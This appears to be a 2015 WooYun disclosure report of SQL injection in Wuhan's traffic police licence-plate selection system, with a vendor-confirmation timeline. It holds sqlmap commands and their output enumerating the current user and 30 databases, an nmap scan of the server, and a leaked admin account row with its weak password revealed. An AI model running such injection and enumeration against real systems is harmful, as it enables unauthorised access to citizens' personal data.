乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-28: 细节已通知厂商并且等待厂商处理中 2015-09-30: 厂商已经确认,细节仅向厂商公开 2015-10-10: 细节向核心白帽子及相关领域专家公开 2015-10-20: 细节向普通白帽子公开 2015-10-30: 细节向实习白帽子公开 2015-11-14: 细节向公众公开
如题,,
武汉市交管局网上自选车牌号系统存sql注入,,一大波个人数据。。目测可以直接自定义选号,毕竟这个系统就是干这个的,,呃,不过没具体测试,,虽然家里没水表。。。友情测试,,所有相关数据已删,注入链接:
http://**.**.**.**:9080/vehweb/getsysparaminfo?action=Hd&glbm=420100&xzqh=420104&hpzl=02
发现过程:这是网上选号的系统,,直接抓包就可以了,
http://**.**.**.**:9080/vehweb/navigator
一大波数据库,,还没配置权限。。可以跨库,,
python sqlmap.py -u http://**.**.**.**:9080/vehweb/getsysparaminfo\?action\=Hd\&glbm\=420100\&xzqh\=420104\&hpzl\=02 --current-use
[12:32:26] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[12:32:26] [INFO] fetching current user[12:32:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[12:32:26] [INFO] retrieved: VEH_ZBZXcurrent user: 'VEH_ZBZX'
python sqlmap.py -u http://**.**.**.**:9080/vehweb/getsysparaminfo\?action\=Hd\&glbm\=420100\&xzqh\=420104\&hpzl\=02 --dbs
available databases [30]:[*] CTXSYS[*] DRV_HEALTH[*] HR[*] MDSYS[*] NET[*] ODM[*] ODM_MTR[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] QS[*] QS_CBADM[*] QS_CS[*] QS_ES[*] QS_OS[*] QS_WS[*] RMAN[*] SCOTT[*] SH[*] SYS[*] SYSTEM[*] TEST1[*] VEH_ZBZX[*] VEHI[*] WHJG[*] WKSYS[*] WMSYS[*] XDB
这个服务器上跑的服务也确实不少。
nmap -A **.**.**.** Starting Nmap 6.47 ( http://**.**.**.** ) at 2015-09-28 15:07 CSTNmap scan report for **.**.**.** (**.**.**.**)Host is up (0.0069s latency).Not shown: 987 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 5.5 (protocol 2.0)| ssh-hostkey: | 1024 1a:4b:46:60:5f:2b:56:17:ca:fd:7d:ed:db:a4:be:fb (DSA)|_ 2048 60:2a:3e:23:72:c9:59:31:12:96:99:4f:ca:97:7e:e7 (RSA)23/tcp open telnet Busybox telnetd80/tcp open http Microsoft IIS httpd 7.5| http-methods: Potentially risky methods: TRACE|_See http://**.**.**.**/nsedoc/scripts/http-methods.html|_http-title: \xE6\xAD\xA6\xE6\xB1\x89\xE5\xB8\x82\xE5\x85\xAC\xE5\xAE\x89\xE5\xB1\x80\xE4\xBA\xA4\xE9\x80\x9A\xE7\xAE\xA1\xE7\x90\x86\xE5\xB1\x8088/tcp open http Microsoft IIS httpd 7.5| http-methods: Potentially risky methods: TRACE|_See http://**.**.**.**/nsedoc/scripts/http-methods.html|_http-title: \xE6\xAD\xA6\xE6\xB1\x89\xE5\xB8\x82\xE5\x85\xAC\xE5\xAE\x89\xE5\xB1\x80\xE4\xBA\xA4\xE9\x80\x9A\xE7\xAE\xA1\xE7\x90\x86\xE5\xB1\x808082/tcp open http Apache Tomcat/Coyote JSP engine 1.1|_http-methods: No Allow or Public header in OPTIONS response (status code 404)|_http-title: Site doesn't have a title.8083/tcp open http Apache Tomcat/Coyote JSP engine 1.1|_http-methods: No Allow or Public header in OPTIONS response (status code 404)|_http-title: Site doesn't have a title.8084/tcp open http Apache Tomcat/Coyote JSP engine 1.1|_http-methods: No Allow or Public header in OPTIONS response (status code 400)|_http-title: Site doesn't have a title.8085/tcp open http Apache Tomcat/Coyote JSP engine 1.1|_http-methods: No Allow or Public header in OPTIONS response (status code 404)|_http-title: Site doesn't have a title.8087/tcp open http Apache Tomcat/Coyote JSP engine 1.1|_http-methods: No Allow or Public header in OPTIONS response (status code 404)|_http-title: Site doesn't have a title.8089/tcp open http Apache Tomcat/Coyote JSP engine 1.1|_http-methods: No Allow or Public header in OPTIONS response (status code 404)|_http-title: Site doesn't have a title.9080/tcp open glrpc?9081/tcp open http Apache Tomcat/Coyote JSP engine 1.1|_http-methods: No Allow or Public header in OPTIONS response (status code 404)|_http-title: Site doesn't have a title.
赤裸裸的个人信息,,这只是冰山一角。
ID,PWD,ORG,NAME,TYPE,STATE,REALNAME,THISLOGIN,LASTLOGIN,CREATETIME1,E10ADC3949BA59ABBE56E057F20F883E,武汉交管局,sa,1,1,系统管理员,02-11月-09 **.**.**.**000 下午,12-10月-09 **.**.**.**000 上午,15-9月 -09 **.**.**.**000 上午
我是不会告诉你们他sa的密码是“123456”的。
还有各种库,,太大了,我就不一一列举了,
过滤,,不过这个治标不治本。这么多系统,就不要放一个数据库里撒,,又不缺钱。。如果缺,,就配置一下权限呗,,不然,这么多系统肯定得有几个有洞的,,
危害等级:中
漏洞Rank:7
确认时间:2015-09-30 11:42
感谢提交!!已通知其修复。
暂无